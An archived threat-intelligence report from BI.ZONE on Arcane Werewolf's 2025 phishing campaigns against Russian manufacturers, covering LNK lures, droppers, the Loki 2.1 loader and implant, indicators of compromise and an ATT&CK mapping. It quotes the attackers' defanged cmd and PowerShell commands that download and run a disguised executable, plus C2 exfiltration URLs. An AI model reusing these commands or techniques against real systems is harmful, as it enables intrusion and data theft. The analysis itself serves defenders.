{
	"id": "2461739b-192c-4d91-b325-cc086229431c",
	"created_at": "2026-04-10T03:22:10.755348Z",
	"updated_at": "2026-04-10T03:22:16.635535Z",
	"deleted_at": null,
	"sha1_hash": "5e03ea2d08d7a521f612245d2b2b137a89aaeac5",
	"title": "Arcane Werewolf revamps its arsenal with Loki 2.1 implant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1627459,
	"plain_text": "Arcane Werewolf revamps its arsenal with Loki 2.1 implant\r\nPublished: 2025-12-17 · Archived: 2026-04-10 02:13:11 UTC\r\nIn October and November 2025, BI.ZONE Threat Intelligence observed malicious activity by Arcane Werewolf (Mythic\r\nLikho) targeting Russian manufacturing enterprises. Retrospective analysis suggests that the threat actor most likely used\r\nphishing emails as the initial access vector, consistent with its previous campaigns. The messages were irrecoverable but\r\npresumably contained links to a malicious archive hosted on the attackers’ C2 server. The links directed victims to a spoofed\r\nwebsite imitating a Russian manufacturing company.\r\nAdversaries often send phishing emails impersonating major or well‑known organizations, as well as national regulators,\r\nor reference them for credibility. The stronger a brand, the more likely threat actors are to exploit its identity. Recognizable\r\nlogos and other branding elements make phishing emails appear more authentic, prompting victims to open them.\r\nIt is important to remember that the organizations whose brands are abused by attackers are not liable for the actions\r\nof criminals and the associated damage.\r\nKey findings\r\nArcane Werewolf continues to target the Russian manufacturing sector.\r\nThe cluster develops and updates its custom malware toolkit, deploying a new Loki 2.1 implant compatible with\r\nthe Mythic and Havoc post‑exploitation frameworks.\r\nThe threat actor uses domain names closely resembling those of the victim organizations.\r\nOctober 2025\r\nDistribution\r\nIn October 2025, BI.ZONE Threat Intelligence recorded Arcane Werewolf activity in which the adversaries distributed links\r\nto ZIP archives containing malicious LNK files. The links pointed to a network resource impersonating a Russian\r\nmanufacturing company, for example: hxxps://disk.npo-[redacted][.]ru/files/1a427fba.zip . After victims clicked it,\r\nthe malicious ZIP was retrieved from a nested URL: hxxps://files.npo-[redacted][.]ru/direct/7b44646d-1b09-45b1-\r\n8977-\r\n62327e6ec1e7/1a427fba/%D0%98%D1%81%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B5%D0%B5%20%E2%84%96%207784%20%D0%BE%D1%82%2010.10.2025%20%D0%BE%D1%8\r\nMalicious archive download\r\nZIP file\r\nThe downloaded archive Исходящее №7784 от10.10.2025 отАО _НПП _[redacted]_.zip (Outgoing notification\r\nNo. 7784 dated 2025-10-10 from [organization]) contains the malicious file Исходящее №7784 от10.10.2025 отАО\r\n_НПП _[redacted]_.pdf.lnk (Outgoing notification No. 7784 dated 2025-10-10 from [organization]) and the Photos\r\nfolder with several JPG images.\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 1 of 9\n\nZIP archive contents\r\nLNK file\r\nThe opening of  Исходящее №7784 от10.10.2025 отАО _НПП _[redacted]_.pdf.lnk (Outgoing notification\r\nNo. 7784 dated 2025-10-10 from [organization]) triggers the following command:\r\ncmd.exe /v:on /c \"set u=hxxps://192.168.1[.]1/m2.png \u0026\u0026 set u=!u:192.168.1[.]1=f.npo-[redacted][.]ru! \u0026\u0026 powershell -c \"$\r\nAs a result, PowerShell is leveraged to retrieve an executable from hxxps://f.npo-[redacted][.]ru/m2.png , save\r\nit as  %TEMP%\\icon2.png , and run it via  conhost.exe .\r\nGo dropper\r\nThe downloaded icon2.png is a PE32+ executable—a malicious dropper written in Go. This file contains an embedded\r\npath to the mail module directory: C:\\Users\\qwerty\\Desktop\\NEW_SKLEIKA\\ready_payloads\\mass_1310 .\r\nThe dropper carries two Base64‑encoded payloads:\r\nchrome_proxy.pdf  , a PE32+ executable (malicious loader)\r\n09.2025.pdf  , a PDF decoy\r\nDropper’s Base64‑encoded payload\r\nThe dropper decodes the payload, writes it to  %TEMP% , and executes the following commands:\r\ncmd.exe /C conhost.exe %TEMP%\\chrome_proxy.pdf  , runs the malicious loader via  conhost.exe\r\ncmd.exe /C start \"\" %TEMP%\\7784_ot09.2025.pdf  , opens the decoy\r\nHere are the example contents of the decoy 7784_ot_29.09.2025.pdf :\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 2 of 9\n\nPDF decoy contents\r\nLoki 2.0 loader\r\nThe malicious loader chrome_proxy.pdf is a PE32+ executable identified as the Loki 2.0 loader. Loki typically comprises\r\ntwo components—a loader and an implant. The implant is compatible with the Mythic and Havoc post‑exploitation\r\nframeworks. The loader’s key capabilities include collecting basic host information (internal IP address, OS version,\r\nusername, computer name), AES‑encrypting and Base64‑encoding the collected data, exfiltrating it to the C2 server, polling\r\nthe server for a malicious payload, and executing it.\r\nAt the time of this research, we were unable to retrieve the Loki implant.\r\nThe collected data is exfiltrated via a GET request to the following URL: hxxps://docs.npo-[redacted][.]ru/data?q=\r\n[encoded_base64_enc_data] .\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 3 of 9\n\nExfiltrated data\r\nNovember 2025\r\nDescription\r\nIn November 2025, BI.ZONE Threat Intelligence registered further Arcane Werewolf activity. We were not able to fully\r\nreconstruct the attack chain. This incident involved a new C++ dropper ( .cpp ) and updated Loki 2.1. We also identified the\r\nadversaries’ C2 server masquerading as a Russian manufacturing company website. Example URL observed:\r\nhxxps://cloud.electropriborzavod[.]ru/files/d8287185e4ae695a .\r\nSpoofed website contents\r\nC++ dropper\r\nThis is a PE32+ executable written in C++. Its malicious payload is compressed and embedded in the resource section.\r\nAlong with the payload, the resources contain the full target path for writing the payload to disk and the payload size. The\r\ndropper dynamically retrieves the required WinAPI functions and extracts the payload to disk using NtCreateFile and\r\nZwWriteFile :\r\nC:\\Users\\Public\\Documents\\исх._7028-\r\n69_от_05.11.2025_О_проведении_внутреннего_расследования.pdf (Ref. 7028-69 dated 2025-11-05, Reg.\r\ninternal investigation), a PDF decoy\r\nC:\\Windows\\Temp\\csrss64.exe , the Loki 2.1 loader\r\nOnce extracted, the dropper opens the decoy by running cmd.exe /C start C:\\Users\\Public\\Documents\\исх._7028-\r\n69_от_05.11.2025_О_проведении_внутреннего_расследования.pdf (Ref. 7028-69 dated 2025‑11-05, Reg. internal\r\ninvestigation). It then executes C:\\Windows\\Temp\\csrss64.exe via the WinAPI function CreateProcessW .\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 4 of 9\n\nDecoy contents\r\nLoki 2.1\r\nIn this case, the Loki 2.1 loader also collected host information, AES‑encrypted the data, Base64‑encoded and sent it to the\r\nC2 server hxxps://cdn.electropriborzavod[.]ru/index?data=[encoded_base64_enc_data] .\r\nUniquely, this loader instance not only fetches the implant from the C2 server but also carries a local, upgraded Loki implant\r\nwithin itself. The loader decrypts the embedded implant from its configuration and invokes the exported start function\r\nin the loader’s own process memory.\r\nThe Loki 2.1 implant supports the same set of commands as Loki 2.0. The only difference is how commands are identified:\r\nwhere Loki 2.0 mapped each command to a certain djb2 hash value, Loki 2.1 maps commands to ordinal numbers.\r\nThe Loki 2.1 implant commands are listed below.\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 5 of 9\n\nCommand No. Description\r\nLoki 2.0\r\nanalogue\r\n0 Terminate the implant’s operation exit\r\n1 Change the interval between calls to the C2 server sleep\r\n2 Upload a file from the C2 server to the compromised host upload\r\n3 Download a file from the compromised host to the C2 server download\r\n4\r\nStart a process via CreateProcessW . If no process/flags are specified, run\r\nC:\\Windows\\System32\\cmd.exe with the  /C flag and redirect I/O streams through\r\na pipe\r\ncreate-process\r\n5\r\nInject code into a target process, with options to:\r\ninject a DLL through PID; entry point (exported function) is located via djb2\r\nhash\r\ninject shellcode through PID\r\ninject shellcode through a process descriptor (handle)\r\ninject\r\n6\r\nChange the current working directory via the WinAPI functions\r\nSetCurrentDirectoryW and GetCurrentDirectoryW\r\ncd\r\n7\r\nTerminate the specified process via the WinAPI functions NtOpenProcess and\r\nNtTerminateProcess\r\nkill-process\r\n8 Execute a Beacon Object File (BOF) bof\r\n9 Obtain the present working directory pwd\r\n10 Manage Windows access tokens token\r\n11 Retrieve all environment variables env\r\nIndicators of compromise\r\nHash sums\r\nZIP\r\n6ccd834fdbba07cf071e3c6de703fbc7f9de10584df127ced27537db2e1a5a03\r\nLNK\r\ne90f7f8594333e0a955a1daccbf5e9030ea86fa3c5c39f58b69d313304020fdd\r\nDecoys\r\nf0cc251a2eb4a73aa20a8a90223600c9053a12ee94a1698ccbb9d189758ff4cb\r\nfcd63239e4065414ba23d1546e18248653f6d937276520f16cf9a29308f65439\r\nGo dropper\r\n5f1d3992e426f47b572af12160f3cc7ac6c90634b17fd6a087eb1644a60a71f8\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 6 of 9\n\nC++ droppers\r\nbe317297dae16dd7b90ddd972b40aca810ff52f6a01a06c96d2dc4bbdd08231d\r\n0f728de0881dc37e79d3e065a331b21f6acadb7d129db2a5bfc27551bba3892e\r\nLoki 2.0 loaders\r\n67751c565593ad4557e73a521b2da96431937296f9dba7d03839e9496031fcbb\r\ne45a1fca84ea0de58f88fe8930b0309f9d736b7384a12f01b7843a9f6469d64b\r\n7fbb29f8724fddfb32b29543e046cf4aceab8f10e5120150f58d7a119162c631\r\nLoki 2.1 loaders\r\n551c0455a608edd88ecd6946c93ed2ac9a68a48148630975a17905205629f617\r\nf73fe375cddea8a869edad7dd33b3783090113ff0dd0ab3b4e275006be40cadc\r\nLoki 2.1 implant\r\nc0de8f8292721192cabe33ac51f2b26468bb2ca70f1e49cfb4647ff70bb14d23\r\nNetwork indicators\r\nnpo-[redacted][.]ru\r\ndisk.npo-[redacted][.]ru\r\nfiles.npo-[redacted][.]ru\r\nf.npo-[redacted][.]ru\r\ndocs.npo-[redacted][.]ru\r\ntest.npo-[redacted][.]ru\r\nelectropriborzavod[.]ru\r\ncloud.electropriborzavod[.]ru\r\ncdn.electropriborzavod[.]ru\r\nhxxps://disk.npo-[redacted][.]ru/files/1a427fba.zip\r\nhxxps://files.npo-[redacted][.]ru/direct/7b44646d-1b09-45b1-8977-\r\n62327e6ec1e7/1a427fba/%D0%98%D1%81%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B5%D0%B5%20%E2%84%96%207784%20%D0%BE%D1%82%2010.10.2025%20%D0%BE%D1%8\r\nhxxps://f.npo-[redacted][.]ru/m2.png\r\nhxxps://docs.npo-[redacted][.]ru/data?q=[base64_enc_data]\r\nhxxps://cloud.electropriborzavod[.]ru/files/d8287185e4ae695a\r\nhxxps://cdn.electropriborzavod[.]ru/index?data=[base64_enc_data]\r\nhxxps://static.my[redacted][.]ru/provider?client=[base64_enc_data]\r\nMITRE ATT\u0026CK\r\nTactic Technique Procedure\r\nInitial Access Phishing: Spearphishing Link Arcane Werewolf uses links in phishing emails to load malware\r\nExecution\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nUses a malicious LNK file to run the following PowerShell\r\ncommand:\r\npowershell -c \"$ProgressPreference='SilentlyContinue' ;iwr -\r\nUri $env:u -OutFile $env:TEMP\\icon2.png;conhost.exe\r\n$env:TEMP\\icon2.png\"\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 7 of 9\n\nTactic Technique Procedure\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nUses a malicious LNK file to run the following CMD command:\r\ncmd.exe /v:on /c \"set u=hxxps://192.168.1[.]1/m2.png \u0026\u0026 set\r\nu=!u:192.168.1[.]1=[malicious_domain]!\r\nEmploys CMD commands in droppers to execute the following\r\nfiles:\r\ncmd.exe /C conhost.exe [malicious_file_path]\r\ncmd.exe /C start [decoy_file_path]\r\nLeverages the Loki implant to remotely execute commands via the\r\ncmd.exe interpreter\r\nNative API\r\nUses the C++ dropper’s WinAPI function CreateProcessW\r\nto execute the malicious payload.\r\nLeverages the Loki implant’s WinAPI function CreateProcessW\r\nto run the process as instructed by the C2 server\r\nUser Execution: Malicious\r\nLink\r\nAttempts to lure victims into clicking links in phishing emails that\r\nlead to malware downloads\r\nUser Execution: Malicious\r\nFile\r\nThe victim must unpack the ZIP archive and open the embedded\r\nLNK file to trigger the compromise\r\nDefense\r\nEvasion\r\nDeobfuscate/Decode Files\r\nor Information\r\nArcane Werewolf employs various droppers to deobfuscate/decode\r\nembedded payloads\r\nIndirect Command Execution\r\nEmploys conhost.exe to run the following malicious executables:\r\nonhost.exe %TEMP%\\icon2.png\r\nconhost.exe %TEMP%\\chrome_proxy.pdf\r\nMasquerading: Double File\r\nExtension\r\nUses the double extension .pdf.lnk in an LNK name\r\nMasquerading: Masquerade\r\nFile Type\r\nUses .png and .pdf extensions to disguise its malicious\r\nexecutables\r\nObfuscated Files\r\nor Information: Dynamic API\r\nResolution\r\nLeverages the djb2 algorithm to hash the names of WinAPI\r\nfunctions and Loki/C++ dropper libraries\r\nObfuscated Files\r\nor Information: Embedded\r\nPayloads\r\nEmbeds the Loki implant in the Loki 2.1 loader\r\nObfuscated Files\r\nor Information:\r\nEncrypted/Encoded File\r\nEmbeds a Base64‑encoded payload in the Go dropper\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 8 of 9\n\nTactic Technique Procedure\r\nObfuscated Files\r\nor Information: Compression\r\nEmbeds compressed payload in the C++ dropper’s resource section\r\nProcess Injection\r\nUses the Loki implant to inject shellcode into certain processes\r\n(as instructed by the C2 server)\r\nProcess Injection: Dynamic-link Library InjectionUses the Loki implant to inject DLLs into certain processes\r\n(as instructed by the C2 server)\r\nDiscovery\r\nSystem Information\r\nDiscovery\r\nLeverages the Loki loader to retrieve data such as computer name\r\nand OS version\r\nSystem Network\r\nConfiguration Discovery\r\nLeverages the Loki loader to obtain the internal IP addresses\r\nof compromised hosts\r\nSystem Owner/User\r\nDiscovery\r\nLeverages the Loki loader to obtain the system username\r\nCommand\r\nand Control\r\nLayer Protocol: Web\r\nProtocols\r\nCommunicates with the C2 server over HTTPS in Loki\r\nData Encoding: Standard\r\nEncoding\r\nEmploys Base64 to encode the encrypted data exfiltrated to the\r\nC2 server\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nUses the AES algorithm in the Loki loader to encrypt data\r\nexfiltrated to the C2 server\r\nIngress Tool Transfer\r\nUses the Loki implant to upload files to the compromised host\r\n(as instructed by the C2 server)\r\nExfiltration Exfiltration Over C2 Channel\r\nUses the Loki implant to exfiltrate files from the compromised host\r\nto the C2 server (as instructed by the latter)\r\nImpact Service Stop\r\nUses the Loki implant to terminate certain processes (as instructed\r\nby the C2 server)\r\nNever miss new threats, subscribe to our latest articles\r\nHow to protect your company from such threats\r\nAttacks similar to those by Arcane Werewolf are not only critical to detect but also to neutralize before they affect the\r\ninfrastructure. To protect your company against advanced threats, we recommend implementing endpoint detection and\r\nresponse practices, for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident\r\nresponse, either automated or manual.\r\nBuilding an effective cybersecurity strategy requires an understanding of tools exploited by threat actors in the wild.\r\nBI.ZONE Threat Intelligence can greatly simplify this task. The portal provides information about the current attacks, threat\r\nactors, their tactics, techniques, tools, and exploited vulnerabilities. This intelligence helps you stay proactive and accelerate\r\nyour incident response.\r\nSource: https://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nhttps://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://bi.zone/eng/expertise/blog/arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki/"
	],
	"report_names": [
		"arcane-werewolf-vernulsya-s-obnovlennym-implantom-loki"
	],
	"threat_actors": [],
	"ts_created_at": 1775791330,
	"ts_updated_at": 1775791336,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5e03ea2d08d7a521f612245d2b2b137a89aaeac5.pdf",
		"text": "https://archive.orkl.eu/5e03ea2d08d7a521f612245d2b2b137a89aaeac5.txt",
		"img": "https://archive.orkl.eu/5e03ea2d08d7a521f612245d2b2b137a89aaeac5.jpg"
	}
}